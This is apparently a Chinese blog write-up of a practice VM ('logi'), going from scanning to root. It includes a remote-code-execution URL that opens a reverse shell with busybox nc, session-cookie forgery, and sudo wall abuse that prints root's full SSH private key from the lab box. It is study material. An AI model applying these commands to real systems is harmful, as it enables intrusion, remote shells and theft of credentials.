Twansh/Eminem
0%

群友靶机logi

发表于
VM靶机的有趣程度不在春秋云镜这样子的靶场之下,通过这个交流群,我才发现我掌握的知识不过是冰山一角,仍然还需要大量且持久的学习

配置好之后,我们的kali应该是和目标靶机处于同一个网段,直接ifconfig

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
┌──(root㉿kali)-[~]
└─# ifconfig
eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        inet 192.168.56.102  netmask 255.255.255.0  broadcast 192.168.56.255
        inet6 fe80::20c:29ff:fe66:2ae1  prefixlen 64  scopeid 0x20<link>
        ether 00:0c:29:66:2a:e1  txqueuelen 1000  (Ethernet)
        RX packets 1  bytes 590 (590.0 B)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 23  bytes 3062 (2.9 KiB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

lo: flags=73<UP,LOOPBACK,RUNNING>  mtu 65536
        inet 127.0.0.1  netmask 255.0.0.0
        inet6 ::1  prefixlen 128  scopeid 0x10<host>
        loop  txqueuelen 1000  (Local Loopback)
        RX packets 168  bytes 13440 (13.1 KiB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 168  bytes 13440 (13.1 KiB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

然后利用arp-scan来进行信息收集

1
2
3
4
5
6
7
8
9
10
┌──(root㉿kali)-[~]
└─# arp-scan -l
Interface: eth0, type: EN10MB, MAC: 00:0c:29:66:2a:e1, IPv4: 192.168.56.102
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.56.1    0a:00:27:00:00:0d       (Unknown: locally administered)
192.168.56.100  08:00:27:f7:c4:82       PCS Systemtechnik GmbH
192.168.56.103  08:00:27:42:80:35       PCS Systemtechnik GmbH

3 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.10.0: 256 hosts scanned in 1.938 seconds (132.09 hosts/sec). 3 responded

根据经验,我们知道192.168.56.103是我们的目标靶机

nmap找一下存活的端口

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
┌──(root㉿kali)-[~]
└─# nmap -sC -sV -p- 192.168.56.103
Starting Nmap 7.95 ( https://nmap.org ) at 2025-10-02 15:10 +08
mass_dns: warning: Unable to determine any DNS servers. Reverse DNS is disabled. Try using --system-dns or specify valid servers with --dns-servers
Nmap scan report for 192.168.56.103
Host is up (0.00051s latency).
Not shown: 65533 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.4p1 Debian 5+deb11u3 (protocol 2.0)
| ssh-hostkey: 
|   3072 f6:a3:b6:78:c4:62:af:44:bb:1a:a0:0c:08:6b:98:f7 (RSA)
|   256 bb:e8:a2:31:d4:05:a9:c9:31:ff:62:f6:32:84:21:9d (ECDSA)
|_  256 3b:ae:34:64:4f:a5:75:b9:4a:b9:81:f9:89:76:99:eb (ED25519)
80/tcp open  http    Apache httpd 2.4.62 ((Debian))
|_http-title: TI15 AME\xE5\x8A\xA9\xE5\xA8\x81
|_http-server-header: Apache/2.4.62 (Debian)
MAC Address: 08:00:27:42:80:35 (PCS Systemtechnik/Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.03 seconds

firefox访问一手

发现是关于dota的,没玩过不太清楚,然后源码页给了一个信息

1
<!--ame:jiayouachunyu-->

类似账号密码?尝试ssh连接,发现连接不上,那应该不是了

使用gobuster扫一下目录

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
┌──(root㉿kali)-[~]
└─# gobuster dir -u http://192.168.56.103/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-*.txt
===============================================================
Gobuster v3.8
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.56.103/
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.8
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/user                 (Status: 200) [Size: 2170]
/admin                (Status: 200) [Size: 1576]
/server-status        (Status: 403) [Size: 279]
Progress: 220558 / 220558 (100.00%)
===============================================================
Finished
===============================================================

扫到了user和admin
user页面可以使用刚才提示的账号密码登录进去
admin界面也有提示

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
<!-- 迷惑表单:表面要用户名/密码/二次验证码,但这些字段并不用于实际认证 -->
 <form method="post" autocomplete="off">
   <label>用户名</label>
   <input type="text" name="username" placeholder="请输入用户名" />

   <label>密码</label>
   <input type="password" name="password" placeholder="请输入密码" />

   <label>二次校验码(可选)</label>
   <input type="text" name="otp" placeholder="XXXXXX" />


   <!-- 供高级用户/工具直接提交 token(不会在界面显著提示) -->
   <label style="display:none">token(内部使用)</label>
   <input type="text" name="token" style="display:none" />

可以直接用cookie登录,这就是很经典的ctf中的session伪造,前面提到过的,nevergiveup在这里其实就是secret key,jwt解码之后改user为admin之后,用secretkey重新编为cookie即可,用burpsuite发包即可登录

admin页面给出了另外一个提示
让我们去访问karsakarsa369.php
firefox访问之后提示我们fuzz,按照打CTF的经验这里应该是fuzz一个get参数,使用ffuf爆破get参数
爆出来是cmd

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
┌──(root㉿kali)-[~]
└─#  ffuf -u 'http://192.168.56.103/karsakarsa369.php?FUZZ=phpinfo();' -w /home/kali/桌面/1.txt --fs 4 

        /'___\  /'___\           /'___\       
       /\ \__/ /\ \__/  __  __  /\ \__/       
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\      
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/      
         \ \_\   \ \_\  \ \____/  \ \_\       
          \/_/    \/_/   \/___/    \/_/       

       v2.1.0-dev
________________________________________________

 :: Method           : GET
 :: URL              : http://192.168.56.103/karsakarsa369.php?FUZZ=phpinfo();
 :: Wordlist         : FUZZ: /home/kali/桌面/1.txt
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: 200-299,301,302,307,401,403,405,500
 :: Filter           : Response size: 4
________________________________________________

cmd                     [Status: 200, Size: 86155, Words: 4281, Lines: 1024, Duration: 324ms]
:: Progress: [5846/5846] :: Job [1/1] :: 1680 req/sec :: Duration: [0:00:03] :: Errors: 0 ::

接下来直接对这个参数的键值进行fuzz
使用这个字典
ctf常用字典
fuzz一下键值对,看看有什么可用的
需要注意的是,光用这个字典fuzz是fuzz不出来东西的,需要自己稍加修改才可以
fuzz出phpinfo();可以访问
按经验,依然大调查disable_functions

1
system,passthru,shell_exec,proc_open,pcntl_exec,dl

发现这些被ban了
用exec进行反弹shell

firefox访问

1
http://192.168.56.103/karsakarsa369.php?cmd=exec(%27busybox%20nc%20192.168.56.102%207777%20-e%20sh%27);
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
┌──(root㉿kali)-[~]
└─# nc -lnvp 7777
listening on [any] 7777 ...
connect to [192.168.56.102] from (UNKNOWN) [192.168.56.103] 33902
ls
admin.php
ameti15-2.jpg
ameti15-3+.jpg
ameti15-4.png
ameti15.jpg
index.html
karsakarsa369.php
user.php
whoami
www-data

成功得到shell

但是这样子弹的shell不知道为什么无法稳定下来

所以还是用bash反弹

虽然可以成功通过稳定操作,但是这个shell有点抽象啊
升级为交互式shell的方法看这里
稳定shell

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
┌──(root㉿kali)-[~]
└─# nc -lnvp 4444
listening on [any] 4444 ...
connect to [192.168.56.102] from (UNKNOWN) [192.168.56.103] 50456
bash: cannot set terminal process group (397): Inappropriate ioctl for device
bash: no job control in this shell
www-data@logi:/var/www/html$ ls
ls
admin.php
ameti15-2.jpg
ameti15-3+.jpg
ameti15-4.png
ameti15.jpg
index.html
karsakarsa369.php
user.php
www-data@logi:/var/www/html$ ^Z  
zsh: suspended  nc -lnvp 4444
                                                                                                                                                                                   
┌──(root㉿kali)-[~]
└─# stty raw -echo; fg
[1]  + continued  nc -lnvp 4444
                               reset xterm
                                          reset: terminal attributes: No such device or address

                                                                                               www-data@logi:/var/www/html$ export TERM=xterm
                                                                                                                                             www-data@logi:/var/www/html$ export shell=/bin/bash
             www-data@logi:/var/www/html$ ls
                                            admin.php
                                                     ameti15-2.jpg
                                                                  ameti15-3+.jpg
                                                                                ameti15-4.png
                                                                                             ameti15.jpg
                                                                                                        index.html
                                                                                                                  karsakarsa369.php
                                                                                                                                   user.php
                                                                                                                                           www-data@logi:/var/www/html$ 
                                                                                                                                                                        www-data@logi:/var/www/html$ 
                  www-data@logi:/var/www/html$ 
                                               www-data@logi:/var/www/html$ 
                                                                            www-data@logi:/var/www/html$ 
                                                                                                         www-data@logi:/var/www/html$ 
                                                                                                                                      www-data@logi:/var/www/html$ 
                                                                                                                                                                   www-data@logi:/var/www/html$ 
             www-data@logi:/var/www/html$ 
                                          www-data@logi:/var/www/html$ 
                                                                       www-data@logi:/var/www/html$ 
1
2
3
4
5
6
7
8
9
10
11
12
13
www-data@logi:/var/www/html$ sudo -l
sudo -l
sudo: unable to resolve host logi: Temporary failure in name resolution

We trust you have received the usual lecture from the local System
Administrator. It usually boils down to these three things:

    #1) Respect the privacy of others.
    #2) Think before you type.
    #3) With great power comes great responsibility.

sudo: a terminal is required to read the password; either use the -S option to read from standard input or configure an askpass helper
sudo: a password is required

发现需要密码
虽然知道大概率不行,还是抱着试一试的心态看了/etc/shadow

1
2
3
4
bash: cd: shadow: Not a directory
www-data@logi:/etc$ cat shadow
cat shadow
cat: shadow: Permission denied

果然不行

我自己做到这一步就没想法了

后面看群友的wp,发现password写在文件里了

1
2
3
www-data@logi:/$ cat /var/backups/passwd
cat /var/backups/passwd
xiangwozheyangderen

那很有说法了,所以可以尝试登录user

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
                                                                                                                                                                      
┌──(root㉿kali)-[~]
└─# ssh ame@192.168.56.103
ame@192.168.56.103's password: 
Linux logi 4.19.0-27-amd64 #1 SMP Debian 4.19.316-1 (2024-06-25) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Sun Sep 28 10:35:26 2025 from 172.20.10.11
ame@logi:~$ ls
user.txt
ame@logi:~$ whoami
ame

成功登录,拿个user的flag

1
2
ame@logi:~$ cat user.txt
user:{niudexiongdiniude}

接下来sudo -l看一下如何提权

1
2
3
4
5
6
7
ame@logi:~$ sudo -l
sudo: unable to resolve host logi: Temporary failure in name resolution
Matching Defaults entries for ame on logi:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User ame may run the following commands on logi:
    (ALL) NOPASSWD: /usr/bin/wall

wall文件可以利用

依然去提权宝典上查利用方法
提权宝典

1
2
LFILE=file_to_read
sudo wall --nobanner "$LFILE"

可以读取任意文件

看大佬的wp,这里应该是读取ssh的私钥文件,来进行ssh登录root
而私钥文件一般写在哪呢
根据下面这篇文章,我们可以知道在Linux中,私钥文件一般写哪个目录下
https://www.cnblogs.com/golinuxstudy/p/15059401.html

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
ame@logi:/$ sudo wall --nobanner "/root/.ssh/id_rsa.pub"
sudo: unable to resolve host logi: Temporary failure in name resolution
                                                                               
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAACAQCdpPQH6Rvrh7zPdqb4ZhR5lD3V6bEylGcxak/SSHd
9kKgEkV/k81ebpTW9nfcoKvzj6A+bBpLNvDpiihDzuwUaixLAdIz+qnjOKjz88IcmJwWBLFv5UU11a7
iAZVt9TXY4ycCUiS0fwc+vnfPdTNqW0a5vE/ECbnmLZc4C7aZe9lDsomkPs40zWXTagKnbjNl2HfMii
apoSyV8URDPdMSQyFXFQGLswgYz2SGuuZuxlS2EpBbX+Eab2GV720U55a0FV0ymTMpGuCs18QcxDeC+
I16yaa/EoJMKbFO3QPfuwWsT2pb1/dnFJyVcE0sR813rpW1iFqW8l0+cogiHp03UULLMa2f1T68pzi5
PZnP1wSHyCZsRlsJROZBf4s8xwLO4NNmlRjvzfMw2JijVi8VpbY2TRJZx0/VD7CjbDoFJb1yNhIXAuS
KRUQjDFn3wn2YUtqwTMDDhtDaBKrVDFpuO9aGDz7DVTqfIGBwqa1jiY+LWRa7hirzwlixEtxM6X4JqZ
Iw9vADqvlcoOANpU9WvCo3iLH51yw0kWeVKBL+B9P8xBS5cTn9ObYjhLomg+wGWpoqxm8bPdTbUcxBX
R8DkJXQ9XC88GfYL5IHYTBI19IaneUQvWrT9QfL5jRrCwM6LOFbFv/ZMuxrB/Q5CAvKTHIJvGvwT1pr
NVnyYwn23gQ== root@logi                                                        
                                                                               
ame@logi:/$ sudo wall --nobanner "/root/.ssh/id_rsa"
sudo: unable to resolve host logi: Temporary failure in name resolution
                                                                               
-----BEGIN OPENSSH PRIVATE KEY-----                                            
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         
yFwO2nf1b1w/AAAACXJvb3RAbG9naQE=                                               
-----END OPENSSH PRIVATE KEY-----

然后把私钥丢给AI,清理掉后面存在的多余空格等

1
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

然后保存起来,重新ssh登录root用户

AI整理的果然出问题了,cao

直接sed整一手,成功得到flag

1
2
root@logi:~# cat /root/provemyself.txt
root{xiangrootzheyangderen}